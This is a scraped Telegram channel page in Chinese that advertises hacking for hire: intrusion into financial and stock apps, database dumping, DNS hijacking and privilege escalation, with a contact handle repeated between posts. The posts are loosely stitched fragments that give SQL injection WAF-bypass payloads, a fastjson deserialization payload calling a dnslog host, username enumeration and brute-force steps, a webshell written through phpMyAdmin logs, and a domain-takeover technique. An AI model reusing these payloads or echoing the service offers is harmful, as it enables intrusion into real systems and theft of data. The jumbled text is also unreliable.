黑客渗透 金融劫持 BC域名跳转
17.9K subscribers
1.79K photos
19 videos
2 files
161 links
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
破解网站app软件技术等等 黑客技术咨询
@hacker_HouZiM
Download Telegram
一旦我认识到iom.org.ph域名确实可用时,我可以注册这个域名,并将这个域名变成iom.int域名的权威解析服务器。这和我们上一篇文章中maris.int域名很相似,并且有一个有趣的问题。当一个人试图访问iom.int域名时,最终通过我们的解析服务器来查询的可能性是百分之50(根据前面“dig iom.int +trace”的结果,读者可以想想为什么是50%)。出现这个结果是因为DNS的轮询调度机制,这是一种利用多个服务器来分散DNS查询负载的技术。这个概念是相当简单的,在DNS系统中,如果你想利用多个服务器来分散DNS的查询负载,对于一个查询,就可能会得到多个结果(这个结果不是最后的IP,而是中间过程中查询到了解析服务器的结果,解析服务器会有多个)。因此,为了均匀的分配负载,你得到的返回结果将会是随机的,这样的话,查询客户端第次查询都会选择一个不同的解析服务器(NS记录)。在这个例子中,当我们查询DNS的A记录时,根据这个机制,有可能在三个IP中随机的返回一个,每个IP的可能性大约是33.33%。举个例子,假设我们要尝试向“.int”顶级域名的解析服务器查询iom.int域名的NS记录(解析服务器)。首先,我们通过下面的步骤得到“.int”顶级域名和解析服务器:
1
我们可以指定扫描的频道范围,并打印出解码后的Enhanced-Shockburst数据包。脚本的可用参数如下所示:
扫描频道范围1-5的设备:


在所有频道中扫描地址开头为0xA9的设备:
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1
常见关键配置用于限定可见性、入口与任务行为。intent-filter 用于匹配可接收的意图类型并决定是否成为入口(包含 MAIN/LAUNCHER 的 activity 即为启动项);exported 明确组件是否对外可访问(Android 12 起必须显式指定);readPermission/writePermission 与 provider 的 authorities、grantUriPermissions 共同约束数据访问;launchMode 与 taskAffinity 控制任务栈与实例化策略;process 指定组件运行进程以实现隔离;debuggable 与 allowBackup 影响调试面与数据备份面暴露面。

查了一下似乎没有测试页面,让 AI 帮忙写了一个脚本,手动跳转到指定的activity,看看能否触发一些请求,再测测有无漏洞。
👍1🥰1
通过不断对order by字符串内容进行增删改,以及 Unicode 编码等操作后,测试效果参考如下:

{"shareType":"4 orderby 1 -- "} - 不拦截,查询失败
{"shareType":"4 order/**/by 1 -- "} - 拦截,502 错误
{"shareType":"4 order/*123*/by 1 -- "} - 拦截,502 错误
{"shareType":"4 order/*"*/by 1 -- "} - 不拦截,查询成功
通过order by获取列数后,开始获取数据库类型及当前数据库。判断数据库类型可以通过不同的查询语法进行判断,当数据查询失败时,可以大致判定当前数据库不支持该语法。不同数据库部分判断依据可参考如下:
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
fastjson反序列化
查看pom.xml文件发现fastjson版本1.2.55,该版本存在漏洞,利用DNSlog进行验证。
fastjson涉及反序列化的方法有两种,JSON.parseObject()和JSON.parse(),在代码中直接搜索parseObject。
1
对该方法进行回溯,随机选取一个判断传进去的参数是否可控。通过上面的SQL注入分析已经知道getUserList方法中的search是直接从前端传进来的,参数可控。直接构造Payload:{"@type":"java.net.Inet4Address","val":"2czklw.dnslog.cn"}

然后在进行URL编码。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
👍1
当用户不存在时提示用户名不存在,可以以此来枚举用户的账号。
成功爆破出用户名。
1
暴力破解
找到登录接口的代码发现登录接口的代码没有做任何防暴力破解的安全措施,根据上面的账号枚举枚举出来的账号直接进行密码爆破,抓包发现密码经过MD5加密的。
1
利用burpsuite进行爆破。

成功爆破出密码。
👍2
SELECT tablename
FROM pg_tables
WHERE schemaname = 'public';
ELECT tablename, schemaname
FROM pg_tables
WHERE schemaname NOT IN ('information_schema', 'pg_catalog');
适用于多模式(schema)环境,过滤掉系统表。

通过information_schema.tables
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
编译项目

cd WebGoat

mvn clean install

运行项目

mvn -pl webgoat-server spring-boot:run

访问WebGoat

localhost:8080/WebGoat

import WebGoat到IDEA 进行代码查看及调试

选择Maven
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
1👍1
通过扫描目录,还发现有phpmyadmin, 可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell
👍21
无论使用何种方法,该活动的最终目标都是利用恶意软件入侵目标主机,该恶意软件主要是一个能够执行远程命令、数据泄露和截屏的后门。该后门模块在 Windows 系统中使用 Python 实现,在 Linux 系统中使用 Go 实现。

或者,攻击链最终还会部署 W4SP Stealer 或剪辑器恶意软件,旨在密切关注受害者的剪贴板活动,并将原始钱包地址(如果存在)与攻击者控制的地址交换。
金融股民渗透国内app,海外网站app,入侵后台,说裤数据库,dns持服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站 联系:@hacker_HouZiM
3